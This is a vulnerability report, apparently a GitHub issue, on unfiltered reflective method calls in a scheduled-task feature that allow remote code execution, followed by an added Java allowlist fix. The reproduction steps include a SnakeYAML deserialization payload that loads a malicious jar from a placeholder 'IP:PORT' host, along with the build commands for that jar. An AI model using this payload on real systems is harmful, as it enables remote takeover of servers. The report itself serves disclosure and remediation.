[vulnerability] Remote Code Execute #168
Comments
Thank you for your feedback. I will fix it as soon as possible, and PRs are also welcome.
1. Steps to reproduce
Using the project https://github.com/artsploit/yaml-payload, modify AwesomeScriptEngineFactory.java as follows
Build and package, then move yaml-payload.jar into the root directory of the web service
javac src/artsploit/AwesomeScriptEngineFactory.java
jar -cvf yaml-payload.jar -C src/ .
A new scheduled task is created as follows
The "Invoke method" field is
org.yaml.snakeyaml.Yaml.load('!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://IP:PORT/yaml-payload.jar"]]]]')
Execute this task after submission to remotely execute arbitrary code
2. Expected behavior
The com.aurora.util.JobInvokeUtil#invokeMethod method is used to reflectively execute the specified method of the given class
3. Actual behavior
However, there is no filtering of incoming class names and method names in this method, resulting in dangerous class names and method names being passed in and executed
4. Affected Version
latest
5. Fixes Recommendations
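An added example, not part of the original issue or the project's code: one way to gate invoke-target strings before com.aurora.util.JobInvokeUtil#invokeMethod reflects on them is an exact-match allowlist of class and method names. The class InvokeTargetAllowlist and the com.example.jobs names are hypothetical placeholders, and the sample strings are constructed.

```java
import java.util.List;
import java.util.Set;

// Added example: allowlist check applied to an invoke-target string before any reflection.
public final class InvokeTargetAllowlist {
    // Assumption: scheduled jobs live only in these classes (placeholder names).
    private static final Set<String> ALLOWED_CLASSES = Set.of(
            "com.example.jobs.CleanupJob",
            "com.example.jobs.ReportJob");
    // Assumption: job classes expose only these methods to the scheduler.
    private static final Set<String> ALLOWED_METHODS = Set.of("run", "runWithArg");

    /** Returns true only if the target names an allowlisted class and method. */
    public static boolean isAllowed(String invokeTarget) {
        if (invokeTarget == null) {
            return false;
        }
        int paren = invokeTarget.indexOf('(');
        // Everything before the first '(' is "<class>.<method>"; arguments are not inspected.
        String callee = (paren >= 0 ? invokeTarget.substring(0, paren) : invokeTarget).trim();
        int lastDot = callee.lastIndexOf('.');
        if (lastDot <= 0 || lastDot == callee.length() - 1) {
            return false; // no class part or no method part
        }
        String className = callee.substring(0, lastDot);
        String methodName = callee.substring(lastDot + 1);
        // Exact match on both parts: anything not listed is denied by default.
        return ALLOWED_CLASSES.contains(className) && ALLOWED_METHODS.contains(methodName);
    }

    public static void main(String[] args) {
        // Constructed sample inputs; the second has the shape of the string in the report.
        List<String> samples = List.of(
                "com.example.jobs.CleanupJob.run()",
                "org.yaml.snakeyaml.Yaml.load('<argument omitted>')",
                "com.example.jobs.CleanupJob.getClass()",
                "java.lang.Runtime.getRuntime()");
        for (String s : samples) {
            System.out.println((isAllowed(s) ? "ALLOW " : "DENY  ") + s);
        }
    }
}
```

Running the same check when a task is saved and again immediately before execution also covers tasks that were stored before the check existed.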